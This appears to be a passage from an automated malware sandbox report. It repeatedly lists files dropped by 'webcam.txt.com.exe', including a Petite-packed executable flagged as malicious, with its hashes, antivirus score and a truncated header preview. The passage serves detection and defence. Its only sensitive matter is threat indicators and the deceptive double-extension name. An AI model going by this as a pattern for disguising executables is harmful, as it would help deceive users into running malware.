                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
